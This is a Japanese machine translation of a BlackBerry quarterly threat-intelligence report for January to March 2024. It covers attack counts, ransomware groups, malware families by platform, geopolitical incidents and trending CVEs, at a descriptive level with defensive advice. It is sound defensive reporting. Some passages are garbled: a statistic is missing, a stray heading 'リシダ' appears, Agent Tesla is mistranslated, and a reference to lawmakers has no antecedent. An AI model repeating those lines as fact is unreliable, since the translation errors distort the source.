重要な実用的インテリジェンス
本レポート(BlackBerry )は、2024年1月から3月までの世界の脅威情勢を包括的にレビューしている。レポートのハイライトは以下の通り:
悪意のあるハッシュは630,000件以上観測され、これは前回の報告期間より1分あたり40%以上増加している 。
詳しくは「今期の総攻撃回数」の項を参照。
全攻撃の60%が重要インフラを狙ったものだった。そのうち 40%が金融セクターを標的としていた。
詳細は 重要インフラ セクション.
CVEの56 %が7.0以上の評価を受けている(10が最も深刻)。CVEは、あらゆる形態のマルウェア(特にランサムウェアや情報窃取ツール)において急速に武器化されている。
詳しくは、「一般的な脆弱性と暴露」のセクションをご覧ください。
新しいランサムウェア・セクション 世界中のトップランサムウェアグループと、この報告期間に最も活発だったランサムウェアに関する新しいセクションを設けました。
詳しくは、「ランサムウェアの Who's Who」をご覧ください。
BlackBerry®Global Threat Intelligence Reports は 3 か月ごとに発行されます。これらの頻繁な更新により、CISOやその他の重要な意思決定者は、各業界や地域における最新のサイバーセキュリティの脅威や課題について常に情報を得ることができます。
この報告書は、サイバー脅威インテリジェンス(CTI)チーム、インシデントレスポンス(IR)チーム、およびCylanceMDR™部門のセキュリティスペシャリストによる調査、分析、結論の集大成です。詳細、PDFのダウンロード、エグゼクティブ・ブリーフはスクロールしてご覧ください。
今期の攻撃総数
本レポートでお気づきのとおり、攻撃総数は必ずしもユニーク ハッシュ(新種マルウェア)の数と相関していません。次の2つのセクションの図2から図6が示すように、すべての攻撃がユニークなマルウェアを利用しているわけではありません。攻撃者の動機、攻撃の複雑さ、そして目的(情報窃取や金銭的窃取など)によって異なります。
BlackBerry サイバーセキュリティ・ソリューションは3,100,000件以上のサイバー攻撃を阻止した。
国別の攻撃
攻撃を阻止
以下の図2は、BlackBerry サイバーセキュリティ・ソリューションが最も多くのサイバー攻撃を防いだ上位5カ国を示している。米国のBlackBerry ソリューションを利用している組織は、この報告期間中に最も多くの攻撃未遂を受けました。アジア太平洋(APAC)地域では、日本、韓国、オーストラリアも高水準の攻撃を受け、上位5位以内に入りました。ラテンアメリカ(LATAM)では、ホンジュラスの顧客が大きな標的となり、同国が5位にランクインしました。
ユニークなマルウェア
今回の報告期間では、BlackBerry 、2023年9月から12月までの期間と比較して、新規ハッシュ(ユニークなマルウェア)が1分あたり40%以上増加していることが確認されました(図1)。図2は、BlackBerry サイバーセキュリティ・ソリューションがユニーク・マルウェアのハッシュ数を最も多く記録した5カ国を示しており、米国が最多となっています。アジア太平洋地域では、韓国、日本、オーストラリアが前回の3カ月間から順位を維持し、ブラジルが新たにランクインしました。
次のセクションで説明するように、他の攻撃者は、制御システムの脆弱性を悪用したり、ネットワーク上のデバイスに感染したりすることで、公共施設のような物理的なインフラに損害を与えたいと考えるかもしれない。
業界別攻撃
前回の報告書と同様、いくつかの主要産業セクターを2つのセクションに統合した:クリティカル・インフラストラクチャー(重要インフラストラクチャー)」と「商業エンタープライズ(商業企業)」である。
CISA(Cybersecurity and Infrastructure Security Agency)が定義する重要インフラは、医療、政府、エネルギー、農業、金融、防衛など16のセクターを含む。
これらのセクターのデジタル化が進んでいることは、その資産がサイバー犯罪者にとってより脆弱であることを意味する。脅威の主体は、システムの設定ミスや従業員に対するソーシャル・エンジニアリング・キャンペーンなどの脆弱性を介して、重要なシステムを積極的に悪用している。
営利企業には、製造業、資本財、商業・専門サービス業、小売業などが含まれる。企業は常にサイバー攻撃の格好の標的であり、コネクテッド・デバイスやクラウド・コンピューティングの利用が増えたことで、そのシステムへの侵入が容易になっている。また、攻撃者はより巧妙になり、ソーシャル・エンジニアリングを利用してアカウント情報を取得し、マルウェアを配布することも多くなっている。
サイバーストーリーハイライト:国際銀行
メキシコの銀行と暗号通貨プラットフォームがAllaKore RATに狙われる
1月、BlackBerry のサイバー脅威アナリストは、修正されたオープンソースのリモートアクセスツールであるAllaKore RATを使用して、メキシコの銀行と暗号通貨取引プラットフォームを標的にした、金銭的動機に基づく長期にわたるキャンペーンを発見しました。脅威行為者は、メキシコ社会保障協会(IMSS)や正規の文書を模倣したルアーを使用して、インストールプロセス中にユーザーの注意をそらし、銀行資格情報や認証情報を盗むことを可能にしました。このキャンペーンは、2021年以降、収益が1億ドルを超えるメキシコの大企業に焦点を当てて継続されている。BlackBerry今回の調査結果は、RATのペイロードにMexico StarlinkのIPが使用されていることやスペイン語の指示があることから、脅威の主体がラテンアメリカにある可能性が高いことを示唆しています。詳細については、当社のブログで記事全文をお読みください。
重要インフラの脅威
当社の内部遠隔測定によると、BlackBerry サイバーセキュリティ・ソリューションが遭遇したサイバー攻撃のうち、 業界固有のものは60パーセントが重要インフラを標的としたものでした。さらに、ユニークなマルウェアのハッシュの32パーセントが、重要インフラのテナントを標的としていました。
CylanceENDPOINT™およびその他のBlackBerry サイバーセキュリティ・ソリューションは、金融、医療、政府、公共事業を含む重要産業部門に対する110万件以上の攻撃を阻止した。この110万件の攻撃のほぼ半数は金融セクターによるものであった。さらに、政府および公共部門の組織は、最も多様な攻撃を経験しており、ユニーク・ハッシュの36%以上がこの部門を標的としていました。
BlackBerry 遠隔測定では、世界中の重要なインフラを標的とするマルウェアの流行が記録されています。例えば、悪名高い情報窃取ツールであるLummaStealerは、特に中南米の食品・農業業界やAPAC地域のエネルギー部門を標的としていることが確認されています。この報告期間中に観測された注目すべき脅威は以下のとおりです:
- 8Baseランサムウェア:ランサムウェアの動作|医療分野
- アマデイ(Amadey Bot):多機能ボットネット|政府関連施設
- ブーティランサムウェア作戦|商業不動産
- LummaStealer(LummaC2):C-based infostealer|食品・農業分野(LATAM)、エネルギー分野(APAC)
- PrivateLoader:ダウンローダー・ファミリー|エネルギー分野
- Remcos(RemcosRAT):業務用リモートアクセスツール(RAT)|食品・農業分野
- ヴィダル(ヴィダースティーラー):コモディティ・インフォステアラー|様々な分野:
- APAC諸国のエネルギー部門
- ラタム諸国のITセクター
- 北米の金融サービス部門
- 欧州、中東、アフリカ(EMEA)の政府施設セクター
重要インフラに対するこれらの脅威の詳細については、付録を参照されたい。
重要インフラが直面する外部脅威
外部脅威とは、BlackBerryの内部遠隔測定以外で記録されたサイバー攻撃のことである。前回の報告期間中、より広範な世界的脅威の状況において、重要なインフラに対する注目すべき攻撃が多数発生した。
米エネルギー省(DOE)の研究施設であるアイダホ国立研究所(INL)で2023年末に発生した情報漏えいの影響は続いている。攻撃者は同研究所のクラウドベースの人事管理プラットフォーム「オラクルHCM」に侵入し、4万5000人以上の個人データを吸い上げた。ハクティビスト集団SiegedSecは、数週間後にこの攻撃の責任を主張し、盗まれたデータの一部をオンライン・リーク・フォーラムに投稿した。図7は、この報告期間中に発生した重要インフラに対する注目すべき脅威のタイムラインである。
サイバーストーリーハイライト: インフラ、VPN、ゼロ・トラスト
緊急指令が明らかにしたVPNリプレースの時期
仮想プライベート・ネットワーク(VPN)の中核的な機能は、1996年の開始以来ほとんど変わっていないが、最近話題になったセキュリティ侵害や政府からの指令は、その利用を再考する時期に来ていることを示唆している。
重要な問題は、VPNの「trust but verify」モデルであり、これは本質的にネットワーク境界内のユーザーに信頼を与え、サイバー攻撃に対して脆弱にする。このリスクを強調し、サイバーセキュリティ・インフラ・セキュリティ庁(CISA)は最近、VPNの重大な脆弱性に対処する緊急指令を発表し、リスクのある製品の迅速な切断を促している。全文はブログでご覧ください。
民間企業の脅威
各業界がサイバーセキュリティの脅威にさらされているのと同様に、個々の企業もサイバー攻撃と戦っている。特に、財務、通信、販売、調達、その他の事業運営において、デジタルインフラへの依存度が高い傾向にある。新興企業から多国籍コングロマリットまで、あらゆる企業がサイバー脅威、特にランサムウェアの影響を受けやすい。
前回の報告期間中、BlackBerry サイバーセキュリティ・ソリューションは、企業セクターの業界を標的とした 70万件の攻撃をブロックした。
社内の遠隔測定によると、前回の報告期間と比べ、営利企業は以下のようになった:
- の増加であった。
- ユニークなハッシュが10%増加した。
営利企業は、MaaS(Malware as a Service:サービスとしてのマルウェア)事業を通じて販売される情報窃取者からの脅威に直面しています。多くの場合、これらの脅威は被害者のデバイス上に追加のマルウェアを展開します。これらのマルウェアは、セキュリティ製品や従来のアンチウイルス(AV)ソフトウェアを回避するためのサイバー軍拡競争の中で進化し続けています。BlackBerry のテレメトリで指摘されている一般的なマルウェアには、以下のようなものがあります:
- レッドライン(レッドライン・ステーラー): インフォスティーラー
- SmokeLoader: 一般的に利用されている汎用性の高いマルウェア
- PrivateLoader: マルウェアを促進する
- ラクーンスティーラー MaaS情報泥棒
- LummaStealer (LummaC2):マルウェア情報泥棒
営利企業に対するこれらの脅威の詳細は、付録を参照されたい。
営利企業が直面する外部からの脅威
ランサムウェアは、あらゆる規模やビジネス志向の組織に対して蔓延している惨劇である。最近のランサムウェア攻撃の例としては、以下のようなものがある:
- ティンバーランド、ザ・ノース・フェイス、バンズといった有名スポーツウェア・ブランドを展開する米国のメーカー、VFコーポレーションが2023年12月、ランサムウェア集団ALPHVによるランサムウェア攻撃の被害に遭った。攻撃者は3,500万人以上の顧客データを盗み、注文処理に遅れが生じるなど、重要なホリデーシーズンに混乱を招いた。
- スウェーデンのスーパーマーケット・チェーンであるコープ・ヴェルムランドは、ランサムウェア集団「Cactus」によるランサムウェア攻撃により、繁忙期であったホリデーシーズンを妨害された。
- ドイツの有名メーカーであるティッセンクルップ社は、2024年2月に自動車関連部門で情報漏洩に見舞われた。同社は後に、この攻撃はランサムウェアによる失敗だったと発表した。
- 3月、Stormousランサムウェア・グループは、20以上のブランドのビールを製造するベルギーのDuvel Moortgat Breweryを攻撃し、88GBのデータを盗んだ。
ランサムウェアの有名人
上記の事象が強調するように、ランサムウェアは、BlackBerry Global Threat Intelligence Report 全体で広く普及している脅威です。本レポートでは、この報告期間に活動したランサムウェアグループに特化したセクションを設けました。
ランサムウェアは、サイバー犯罪者や組織的シンジケートによって採用されている普遍的なツールであり、世界中のあらゆる業界の被害者を標的としています。これらのグループのほとんどは金銭的な動機に基づくもので、従来のサイバーセキュリティの防御を回避するために新しい戦術や技術を素早く適応させ、新しいセキュリティの脆弱性を迅速に悪用します。
ヘルスケアは、医療記録のデジタル化が進み、これらのサービスが中断された場合に深刻な影響が生じる可能性があるため、ランサムウェアグループにとって収益性の高い分野となっています。この報告期間中、世界各地で顕著な攻撃が発生しており、これらの攻撃的なシンジケートは人命を危険にさらし、医療従事者が患者の重要な個人識別情報(PII)データにアクセスすることを制限または遮断する可能性があります。
医療への攻撃は、病院、診療所、薬局、調剤薬局を麻痺させ、患者が重要な薬を入手するのを妨げ、救急車のルートを変更させ、医療処置のスケジュールを混乱させるなど、深刻な打撃を与える可能性がある。二次的な影響としては、データの流出や、ダークウェブで販売される患者の機密情報などがある。このような理由から、2024年を通して医療は公的にも私的にも大きな標的とされ続けると予測している。
本報告期間におけるランサムウェアの主要プレイヤー
以下は、この報告期間中に活動した、世界各地の注目すべきランサムウェア脅威グループである:
ハンターズ・インターナショナル
2023年後半から活動しているランサムウェア・アズ・ア・サービス(RaaS)の犯罪シンジケートであるHunters Internationalは、2024年初頭に頭角を現した。このグループは、2023年初頭に法執行機関によってシャットアウトされた Hiveランサムウェアグループのスピンオフである可能性がある。このグループは、まず被害者のデータを暗号化して身代金を要求し、次に盗んだデータを公開すると脅してさらに金銭を要求するという、二重の恐喝スキームを採用している。Hunters Internationalは現在、世界中で活動しています。
8Base
当初2022年に確認された8Baseランサムウェアグループは、2023年後半に台頭しました。この多作なグループは、さまざまな戦術、技術、手順(TTP)を使用し、非常に日和見的であることがあります。このグループは多くの場合、新たに公開された脆弱性を素早く悪用し、 Phobosを含むさまざまなランサムウェアを活用します。
ロックビット
ロシアを拠点とするランサムウェア・グループであるLockBitは、その名を冠したマルウェアを通じてRaaSを提供することに特化している。2020年に発見された LockBitランサムウェアは、最も攻撃的なランサムウェアグループの1つとなっています。その側面は以下の通り:
- ダークウェブ上のリークサイトを通じて、暗号化前の被害者データを流出させ、ホスティングするためのカスタムツール。
- 主に北米、二次的にラテンアメリカの被害者をターゲットにしている。
- 二重の恐喝戦略を採用。
2024年2月、国際的な法執行活動であるオペレーション・クロノスは、ロックビットのオペレーションを妨害した。しかし、LockBitはその後立ち直ったようで、ランサムウェアの分野では主要なプレーヤーであり続けている。
プレイ
2022年当初に観測された Playは、匿名通信を可能にするTORベースのサイト上で盗まれたデータをホストし、身代金の支払いがなければデータが流出すると脅す、複数の恐喝を行うランサムウェアグループです。Playは、主に北米の中小企業(SMB)をターゲットにすることが多いのですが、この報告期間中にはEMEA地域でも発生しました。同グループは主に、Cobalt Strike、Empire、Mimikatzのような既製のツールを発見と横移動のTTPに活用しています。また、ランサムウェアの実行前に使用されるカスタム偵察・情報窃取ツールであるGrixbaも活用しています。
BianLian
BianLianはGoLangベースのランサムウェアで、2022年から野放しになっている。この関連グループは、この報告期間中、北米を拠点とする被害者をターゲットとして活発に活動しています。多くのランサムウェアグループがそうであるように、 BianLianは最近公開された脆弱性を非常に悪用しており、多くの業種の小規模な企業を標的としています。BianLianは、PingCastle、Advance Port Scanner、SharpSharesなど、市販のさまざまなツールを使用してターゲット・システムの足場を固めた後、機密データを窃取し、ランサムウェアを実行します。この盗まれたデータは、身代金が支払われるまで、恐喝戦術として活用されます。
ALPHV
BlackCatまたはNoberusと呼ばれることもあるALPHVは、2021年後半から存在するRaaSオペレーションである。ALPHVの背後にいる脅威グループは非常に洗練されており、Windows、Linux、VMWareベースのオペレーティングシステムを標的とするRustプログラミング言語を活用しています。ALPHVは北米の被害者を標的にする傾向があります。
ランサムウェアグループは...従来のサイバーセキュリティの防御を回避するための新しい戦術や技術を素早く適応させ、新しいセキュリティの脆弱性を迅速に悪用する。
サイバーストーリーハイライトランサムウェアとヘルスケア
収入のない12日間:医療分野でランサムウェアの被害が続く
米国病院協会(AHA)によると、3月、医療部門は病院や薬局の業務を妨害する "前例のない "ランサムウェア攻撃を経験した。年間150億件の医療取引を処理するChange Healthcareへの攻撃は、臨床判断支援や薬局業務などの患者ケアサービスに深刻な影響を与えた。この混乱は、影響を受けた医療行為に12日間の収益停止をもたらし、患者は重要な処方箋へのアクセスに苦労することになった。米国保健社会福祉省の市民権局が調査中の最新データでは、サイバー脅威が大幅に増加していることが明らかになっており、過去5年間で大規模なハッキング侵害が256%増加している。この事件は、医療業界におけるサイバーセキュリティ対策の強化の必要性を強調している。この差し迫った問題の詳細については、当社のブログで全文をお読みください。
地政学的分析とコメント
地政学的な対立がサイバー攻撃の原動力となることが増えている。デジタル技術は善のための強力なツールとなりうるが、国家や非国家主体によって悪用されることもある。2024年の最初の3カ月間に、ヨーロッパ、北米、アジア太平洋地域の国会議員が標的型スパイウェアの被害に遭いました。脅威者は複数の政府省庁のITシステムに侵入し、軍事システムを侵害し、世界中の重要なインフラを混乱させた。
こうした侵入の動機は複雑で不透明なことが多いが、最近の事件で最も重要なものは、ロシアのウクライナ侵攻、イスラエルとイランの間で高まっている侵略、南シナ海やインド太平洋地域で進行中の緊張など、地政学上の大きな分断に関わるものだった。
ウクライナでは、サイバー戦争が続いている。サイバースペースにおける合法的な行動を規定する国際規範に反して、ウクライナに対して行われた攻撃は、民間と軍事インフラの区別がつかないまま続いている。1月には、ロシアの諜報員がキエフの住宅用ウェブカメラを盗聴し、ミサイル攻撃を開始する前に同市の防空システムに関する情報を収集したとされる。報告書によれば、攻撃者たちは、より正確なミサイル照準のために、カメラアングルを操作して近くの重要インフラに関する情報を収集した。
ロシアのサイバー脅威者は、ウクライナ最大の携帯電話プロバイダーであるキエフスターに対する攻撃にも関連しており、重要なインフラを破壊し、ウクライナの2400万人の顧客へのアクセスを遮断した。この攻撃は、バイデン大統領がワシントンD.C.でゼレンスキー大統領と会談する数時間前に行われた。これらの議員の多くは、欧州議会の安全保障・防衛小委員会のメンバーで、EUのウクライナ支援に関する勧告を担当していた。3月には、ロシアの攻撃者がウクライナへの軍事支援の可能性に関するドイツ軍関係者の会話を傍受しており、スパイ活動の増加から通信を保護する必要性が高まっている。
イランとイスラエルの軍事活動がエスカレートするにつれ、イスラエル政府のサイトに対するサイバー攻撃もエスカレートしている。報復として、イスラエルの脅威勢力はイラン全土のガソリンスタンドの70%を妨害した。一方、米国は、紅海でフーシ派反体制派と情報を共有していたイラン軍のスパイ船に対するサイバー攻撃を開始した。
インド太平洋地域では、中国の支援を受けたグループによるサイバー攻撃やスパイ活動が続いている。米国土安全保障省のサイバー安全審査委員会は、2023年夏に発生したマイクロソフト・オンライン・エクスチェンジ事件に関する重要な報告書を発表し、中国の支援を受けた攻撃者がマイクロソフトからソースコードを盗んだ手口を詳細に記録した。脅威グループStorm-0558は、米国務省、米商務省、米下院、英国の複数の政府省庁の職員や関係者に危害を加えた。報告書によると、脅威者は国務省だけで約6万通の電子メールをダウンロードすることに成功した。
これは孤立した事件ではなかった。2024年3月、米司法省とFBIは、中国の攻撃者が「中国に関する列国議会同盟」の英国、EU、米国、カナダのメンバー数名を標的にしていたことを明らかにした。
先に述べたように、重要インフラに対する攻撃は、特に金融や医療分野で増加している。2024年1~3月には、フランスの医療保険会社で大規模なデータ侵害が発生し、機密性の高い個人情報が流出した。カナダでは、金融取引報告分析センター(FINTRAC)がサイバー事件を受けてシステムを停止した。これを受けてカナダ政府は、FINTRACのサイバー耐性を強化し、データ・セキュリティの安全策を構築するために2,700万カナダドルを割り当てた。
世界各国政府は、サイバースパイやサイバー攻撃の増加に直面し、より強固なサイバーセキュリティへの投資を進めている。カナダは最近、サイバー防衛への歴史的レベルの投資を発表し、英国は防衛支出をGDPの2.5%に増やした。サイバーセキュリティは、政府にとっても民間企業にとっても依然として最重要リスクのひとつであり、地政学的緊張が高まり続ける限り、この傾向は続くだろう。
インシデント・レスポンスの観察
BlackBerry 事故対応チームの見解
これは、BlackBerry チームが対応した IR 契約の種類と、このような侵害を防ぐために組織が講じることのできるセキュリティ対策の概要である。
- ネットワークへの侵入: 最初の感染経路が、ウェブサーバや仮想プライベートネットワーク(VPN)アプライアンスなど、インターネットに接続された脆弱なシステムであったインシデント。侵入された結果、標的の環境内にランサムウェアが展開され、データが流出したケースもある。
- 予防する:インターネットに公開されているすべてのシステムに、適時にセキュリティ更新プログラムを適用する。(MITRE - 外部リモートサービス、T1133)。
- インサイダーの不正行為 現従業員および/または元従業員が、許可なく会社のリソースにアクセスした。
- 予防する:すべてのシステムに強固な認証セキュリティ管理を導入する。従業員の正式なオフボーディング手続きを実施する。(MITRE - Valid Accounts: Cloud Accounts,T1078.004.)
- ランサムウェア: 対応したインシデントの10%がランサムウェアベースだった。
- 予防:電子メール、VPN、Web サーバなど、インターネットに接続されたサービスに適時パッチを適用する。これにより、脆弱なデバイスやシステムを介して企業ネットワークにアクセスした脅威者が、ランサムウェアを展開するなどの目的にアクセスし、さらに行動を起こすことを防ぐことができます。(MITRE - 外部リモートサービス、T1133)。
- 予防:組織が、すべての重要なデータのコピーを、元のデータソースから2つの異なるメディア形式で2部保管し、少なくとも1部はオフサイトに保管していることを確認する。
サイバーセキュリティ・インシデントの検出、封じ込め、回復には、被害を最小限に抑えるための迅速な検出と対応が必要です。組織には、十分に文書化されたインシデント対応計画を策定し、訓練された人材とリソースを備えて、侵害の可能性がある最初の兆候に即座に対応できるようにしておくことが不可欠です。これにより、セキュリティ・チームは問題を可能な限り早期に検出し、脅威を迅速に封じ込め、根絶することができ、ビジネスやブランドの評判への影響、金銭的損失、組織に対する法的リスクを軽減することができます。
脅威のアクターとツール
脅威の担い手
2024年の最初の3ヶ月間に数十の脅威グループがサイバー攻撃を行った。ここでは、最もインパクトのある攻撃を取り上げた。
ロックビット
2月、NCA、FBI、欧州刑事警察機構(Europol)は、"Operation Chronos"(クロノス大作戦)と名付けられた世界的な協調活動を展開した。オペレーション・クロノス10カ国の法執行機関と協力し、ロックビット・グループのインフラとリーク・サイトを掌握し、彼らのサーバーから情報を収集し、逮捕し、制裁を科した。
しかし、それから1週間も経たないうちに、このランサムウェア・グループは再編成し、攻撃を再開した。この攻撃は、法執行機関の妨害を受けて、被害者を新しいサーバーに誘導する最新の暗号化と身代金のメモを採用している。
ロックビットは、キャピタル・ヘルスの病院ネットワークを含む様々なネットワークに対するサイバー攻撃の責任を主張している。いずれの場合も、身代金を速やかに支払わなければ機密データを公開すると脅していた。
リシダ
APT29
CISAは最近、APT29が標的を拡大し、さらに多くの産業や地方自治体を含むようになったと警告した。幅広いカスタムマルウェアを使用することで知られるこの脅威グループは、最近、侵害されたサービスアカウントや盗まれた認証トークンを使用してクラウドサービスも標的にしている。
この報告期間中、APT29はパスワードスプレー攻撃を受けてマイクロソフトのテスト用テナントアカウントにアクセスし、悪意のあるOAuthアプリケーションを作成して企業の電子メールアカウントにアクセスすることが確認されています。さらに、2024年1月に初めて観測されたバックドアであるWINELOADERを使用して、ドイツの政党を標的としていました。
アキラ
アキラはこんな道具を使うことで知られている:
- Active Directoryを照会するためのAdFind。
- MimikatzとLaZagneがクレデンシャルにアクセスした。
- ファイアウォールやその他のセキュリティ対策の背後にあるネットワークにトンネリングするためのNgrok。
- リモートアクセスのためのAnyDesk。
- ネットワーク上のデバイスを検索するための高度なIPスキャナ。
脅威行為者が使用する主なツール
ミミカッツ
コバルト・ストライク
ングロク
コネクトワイズ
プラットフォーム別の脅威Windows
レムコス
リモートアクセス型トロイの木馬
Remcosとは、Remote Control and Surveillanceの略で、被害者のデバイスにリモートアクセスするためのアプリケーションである。
テスラ捜査官
インフォシーラー
Agent Teslaは.NETベースのトロイの木馬で、MaaSとして販売されることが多く、主にクレデンシャル・ハーベスティングに使用されます。
レッドライン
インフォシーラー
RedLineマルウェアは、幅広いアプリケーションやサービスを利用して、クレジットカード情報、パスワード、クッキーなどの被害者のデータを不正に流出させます。
ライズプロ
インフォシーラー
RiseProの更新されたバリエーションは前回のレポートで確認されたが、今回の報告期間中、この情報窃取者は、GitHubリポジトリ上で「クラックされたソフトウェア」として偽って配布される新たなキャンペーンで確認された。
スモークローダー
バックドア
SmokeLoaderは、他のペイロードをダウンロードして情報を盗むために使用されるモジュール型のマルウェアです。当初は2011年に観測されましたが、現在も活発な脅威となっています。
プロメテイ
暗号通貨マイナー/ボットネット
Prometeiは、主にMoneroコインを標的とするマルチステージのクロスプラットフォーム暗号通貨ボットネットです。このボットネットは、ペイロードを調整してLinuxまたはWindowsプラットフォームをターゲットにすることができます。Prometeiは、可能な限り多くのエンドポイントに拡散するために、Mimikatzとともに使用されています。
ブーティ
ランサムウェア
Buhtiは、LockBitやBabukのような他のマルウェアの既存のバリエーションを利用し、LinuxやWindowsシステムを標的にしたランサムウェア作戦である。
プラットフォーム別の脅威Linux
XMRig
暗号通貨マイナー
この報告期間中、XMRigが引き続き流行している。このマイナーはMoneroを標的としており、脅威者は被害者のシステムを使用して、被害者が知らないうちに暗号通貨を採掘することができます。
ノアボット/みらい
分散型サービス拒否(DDoS)
NoaBotは、Miraiの亜種としてやや洗練されている。Miraiに比べて難読化技術が向上しており、拡散にはTelnetではなくSSHを使用する。また、GCCの代わりにuClibcでコンパイルされており、検知を困難にしている。
XorDDoS
DDoS
私たちのテレメトリで頻繁に観測されるXorDDoSは、Linuxを実行するインターネットに面したデバイスを標的とし、C2命令によって感染したボットネットを調整するトロイの木馬型マルウェアです。その名前は、実行データと通信データへのアクセスを制御するためにXOR暗号を使用することに由来します。
アシッドプール
ワイパー
我々のテレメトリには存在しないが、データ・ワイパーAcidPourの新バージョンが野生で確認されている。このマルウェアの最新バージョンは、ルーターやモデム上のファイルをワイプするために利用され、特にLinux x86デバイスを標的とするように設計されている。
プラットフォーム別の脅威MacOS
ラストドア
バックドア
RustDoorはRustベースのバックドア型マルウェアで、主に正規プログラムのアップデートを装って配布されます。このマルウェアは、Mach-o ファイルを含む FAT バイナリとして拡散します。
アトミック・スティーラー
インフォシーラー
Atomic Stealer (AMOS)の新バージョンが発見され、依然として流行している。このステーラーの最新バージョンは、検知されないようにPythonスクリプトを使用します。AMOSは、パスワード、ブラウザ・クッキー、オートフィル・データ、暗号ウォレット、Macキーチェーンデータを標的としている。
エンパイア・トランスファー
インフォシーラー
2024年2月にMoonlock Labによって発見された情報窃取者。仮想環境で実行されていることを検知すると「自己破壊」することができる。これにより、マルウェアは検知されずに残り、防御側にとっては分析がより困難になる。Empire Transferは、パスワード、ブラウザのクッキー、暗号ウォレットを標的とし、Atomic Stealer (AMOS)と同様の手口を利用します。
プラットフォーム別の脅威アンドロイド
スパイノート
インフォステア/RAT
SpyNoteはAndroid Accessibility Serviceを利用してユーザーデータを取得し、取得したデータをC2サーバーに送信する。
アナツァ/テアボット
インフォシーラー
主にトロイの木馬型アプリケーションとしてGoogle Playストアを通じて配布されます。トロイの木馬型アプリケーションから最初に感染した後、AnatsaはC2サーバーから被害者のデバイスに追加の悪意のあるファイルをダウンロードします。
ヴルトゥール
インフォステア/RAT
2021年に初めて発見されたVulturは、トロイの木馬アプリケーションや「スミッシング(SMSフィッシング)」と呼ばれるソーシャルエンジニアリングの手法を通じて配布されてきました。データの流出に加え、脅威者はファイルシステムに変更を加えたり、実行権限を変更したり、Android Accessibility Servicesを使用して感染したデバイスを制御したりすることもできます。
コパー/オクト
インフォステア/RAT
Exobotファミリーの亜種。MaaS製品としてパッケージ化され、キーロギング、SMSモニタリング、スクリーンコントロール、リモートアクセス、C2オペレーションなどの機能を持つ。
一般的な脆弱性と暴露
CVEs(Common Vulnerabilities and Exposures:共通脆弱性・暴露)は、既知のセキュリティ脆弱性と暴露を特定し、標準化し、公表するための枠組みを提供する。前述したように、サイバー犯罪者が CVE を利用してシステムに侵入し、データを盗むケースが増えています。この報告期間中、Ivanti、ConnectWise、Fortra、Jenkinsの各製品で新たな脆弱性が発見され、悪質業者は被害者を標的にする新たな方法を提供しました。さらに、ここ数カ月では、オープンソースプロジェクトに存在する可能性のあるサプライチェーン攻撃のリスクを、Linuxのほぼすべてのインストールで利用可能なデータ圧縮ユーティリティであるXZ Utilsに意図的に仕込まれたXZバックドアで実証しました。
国立標準技術研究所(NIST)により、1月から3月までに約8,900件の新たなCVEが 報告された。ベース・スコアは慎重に計算された指標で構成され、0から10までの深刻度スコアの算出に使用できる。CVEの基本スコアは「7」が圧倒的に多く、全体の26%を占めた。このCVEスコアは、前回の報告期間と比較して3%増加している。今年3月に新たに発見されたCVEは、これまでのところ3,350件に達し、最多記録となっています。Trending CVEs の表は、NIST National Vulnerability Database に掲載されている特定の脆弱性を参照しています。
トレンドCVE
XZ Utils バックドア
CVE-2024-3094(10 クリティカル)
不正アクセス
この悪質なコードは、XZ Utils バージョン 5.6.0 および 5.6.1 に埋め込まれていました。このバックドアは sshd を操作し、認証されていない攻撃者に、影響を受ける Linux ディストリビューションへの不正なアクセスを許可します。
Ivantiのゼロデイ脆弱性
CVE-2024-21887(9.1 重大);CVE-2023-46805(8.2 高);CVE-2024-21888(8.8 高);CVE-2024-21893(8.2 高)
任意のコード実行
今年初め、Ivanti Connect Secure (9.x, 22.x)およびIvanti Policy Secure (9.x, 22.x)製品に認証バイパスおよびコマンドインジェクションの脆弱性が発見された。この脆弱性は、Ivanti Connect Secure (9 x, 22 x)およびIvanti Policy Secure (9 x, 22 x)製品に存在し、両製品が脅威者によって使用された場合、悪意のあるリクエストを作成し、システム上で任意のコマンドを実行することが可能になります。
Ivantiは1月にも、同製品に影響を及ぼす2つの脆弱性、CVE-2024-21888(特権昇格の脆弱性)とCVE-2024-21893(サーバーサイドリクエストフォージェリの脆弱性)について警告している。国家行為者は、これらのゼロデイ脆弱性を悪用し、カスタムマルウェア株を展開している。
ウィンドウズ・スマートスクリーンのバイパス
CVE-2024-21412(8.1 High)
セキュリティバイパス
これは、Microsoft Windowsのインターネットショートカットファイルに影響する、インターネットショートカットファイルのセキュリティ機能のバイパスです。セキュリティチェックをバイパスするには、ユーザーによる操作が必要です。この脆弱性を利用し、DarkMe RATは、Windowsのインターネットショートカットファイルのセキュリティ機能を迂回します。このゼロデイ脆弱性は、脅威グループによる DarkMe RAT の展開に利用されました。
Windowsカーネル昇格の脆弱性
CVE-2024-21338(7.8 High)
特権の昇格
この脆弱性を悪用すると、攻撃者はシステム特権を得ることができる。Lazarus Group(北朝鮮の脅威グループ)は、WindowsのAppLockerドライバ(appid.sys)内に見つかったこのゼロデイ脆弱性を悪用し、カーネルレベルのアクセスを獲得した。
FortraのGoAnywhere MFTエクスプロイト
CVE-2024-0204(9.8 クリティカル)
認証バイパス
1月、FortraはGoAnywhere MFT製品に影響を及ぼす重大なバイパスについてセキュリティアドバイザリを発表しました。この脆弱性は、Fortra の 7.4.1 より前の GoAnywhere MFT 内で発見されました。この脆弱性を悪用することで、管理ポータルを介して権限のないユーザーが管理者ユーザーを作成することが可能になります。
Jenkinsに任意ファイル読み取りの脆弱性
CVE-2024-23897(9.7 クリティカル)
リモートコード実行
Jenkinsの以前のバージョン(2.441以前、LTS 2.426.2まで)には、組み込みのコマンドラインインターフェースを介してJenkinsコントローラのファイルシステム上で発見された脆弱性が含まれています。この脆弱性はargs4jライブラリに存在し、args4jライブラリには、引数のファイルパスに続く"@"文字をファイルの内容に置き換える機能があります。
ConnectWise ScreenConnect 23.9.7の脆弱性
CVE-2024-1709(10 重大);CVE-2024-1708(8.4 高)
リモートコード実行
この脆弱性は、ConnectWise ScreenConnect 23.9.7 製品に影響します。攻撃者は、これらの脆弱性の両方を利用することが確認されています。両者は連動して動作し、CVE-2024-1709(クリティカルな認証バイパスの脆弱性)により、攻撃者は管理者アカウントを作成し、CVE-2024-1708(パストラバーサルの脆弱性)を悪用し、被害者のファイルやディレクトリへの不正アクセスを可能にします。
MITREの共通テクニック
脅威グループのハイレベルなテクニックを理解することは、どの検知テクニックを優先させるべきかを決定する際に役立ちます。BlackBerry 、本レポート期間中に脅威行為者によって使用されたテクニックのトップ20は以下の通りです。
